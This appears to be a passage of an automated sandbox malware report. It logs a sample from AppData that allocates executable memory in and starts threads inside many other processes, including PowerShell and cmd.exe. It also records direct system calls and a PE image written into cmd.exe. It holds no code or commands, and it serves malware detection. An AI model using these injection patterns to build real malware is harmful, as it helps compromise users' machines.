                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 390000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2D20000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 24E0000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2510000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2550000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2460000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 29F0000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2090000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 20A0000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2C90000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 26A0000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2E00000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2280000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 26B0000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2CC0000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 3090000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: FE0000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2980000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2EC0000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2DF0000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2570000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 31C0000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 2910000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 1530000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe base: 25B0000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Users\user\Desktop\services.png.exe base: 2810000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exe base: 2320000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe base: 980000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Users\user\AppData\Local\Temp\tmp7e3ae9cd\smbhost.exe base: 740000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Users\user\AppData\Local\Temp\tmpa49210ef\SearchUI.exe base: 410000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2F0000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeMemory allocated: C:\Windows\System32\conhost.exe base: 370000 protect: page execute and read and writeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe EIP: 29B01D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe EIP: 2E501D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe EIP: 25501D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe EIP: 2E701D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe EIP: 24201D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe EIP: 25F01D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe EIP: 2CC01D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe EIP: CB01D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe EIP: 2F701D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe EIP: 2B501D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe EIP: 23B01D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe EIP: 2CB01D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 2A001D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 25001D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 16601D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 2CE01D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 23301D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 2A701D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 27401D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 24801D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 27601D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 11D01D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 2EC01D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 2AE01D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 24E01D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 2D201D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 2AE01D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 31B01D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 2A601D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 3B01D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 2C801D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 29901D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 2B401D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 28001D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 22301D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 28A01D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 12001D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: DC01D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 7B01D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 26F01D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 25A01D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 2C601D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 25D01D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 2F301D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 7201D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 2C901D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 26301D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 6F01D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 11501D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 9F01D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: BB01D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 26001D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: C301D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 7B01D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 3B01D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 2D401D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 25001D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 25301D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 25701D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 24801D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 2A101D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 20B01D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 20C01D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 2CB01D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 26C01D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 2E201D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 22A01D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 26D01D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 2CE01D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 30B01D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 10001D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 29A01D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 2EE01D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 2E101D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 25901D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 31E01D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 29301D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 15501D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 25D01D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 28301D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 23401D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 9A01D7Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeThread created: unknown EIP: 4301D7Jump to behavior
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9C
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeNtClose: Direct from: 0x76F02B6C
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeNtCreateKey: Direct from: 0x76F02C6C
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeNtReadVirtualMemory: Direct from: 0x76F02E8C
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeNtSetInformationThread: Direct from: 0x76F02B4C
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeNtQueryAttributesFile: Direct from: 0x76F02E6C
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeNtQuerySystemInformation: Direct from: 0x76F048CC
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeNtSetInformationFile: Direct from: 0x76F02D0C
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2C
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeNtOpenSection: Direct from: 0x76F02E0C
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeNtDeviceIoControlFile: Direct from: 0x76F02AEC
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeNtQueryValueKey: Direct from: 0x76F02BEC
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeNtAddAtomEx: Direct from: 0x76F0312C
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeNtQueryDirectoryFile: Direct from: 0x76F02DEC
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeNtQueryDefaultLocale: Direct from: 0x76F02BCC
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeNtCreateFile: Direct from: 0x76F02FEC
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeNtOpenFile: Direct from: 0x76F02DCC
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeNtEnumerateValueKey: Direct from: 0x76F02BAC
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeNtSetInformationThread: Direct from: 0x76F02ECC
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeNtQueryInformationToken: Direct from: 0x76F02CAC
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeNtTerminateThread: Direct from: 0x76F02FCC
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeNtSetTimerEx: Direct from: 0x76EF7B2E
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeNtAdjustPrivilegesToken: Direct from: 0x76F02EAC
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeNtOpenKeyEx: Direct from: 0x76F02B9C
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeNtProtectVirtualMemory: Direct from: 0x76F02F9C
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeNtSetInformationProcess: Direct from: 0x76F02C5C
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeNtNotifyChangeKey: Direct from: 0x76F03C2C
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeNtUnmapViewOfSection: Direct from: 0x76F02D3C
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeNtCreateMutant: Direct from: 0x76F035CC
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeNtWriteVirtualMemory: Direct from: 0x76F02E3C
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeNtMapViewOfSection: Direct from: 0x76F02D1C
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeNtResumeThread: Direct from: 0x76F036AC
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeNtSetValueKey: Direct from: 0x76F0309C
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeNtSetTimerEx: Direct from: 0x76F0458C
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeNtWriteFile: Direct from: 0x76F02AFC
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFC
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeNtReadFile: Direct from: 0x76F02ADC
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeNtQuerySystemInformation: Direct from: 0x76F02DFC
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeNtDelayExecution: Direct from: 0x76F02DDC
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeNtEnumerateKey: Direct from: 0x76F02DBC
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeNtSetSecurityObject: Direct from: 0x76F0450C
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeNtQueryInformationProcess: Direct from: 0x76F02C26
                        Source: C:\Users\user\Desktop\services.png.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 2960000 value starts with: 4D5AJump to behavior
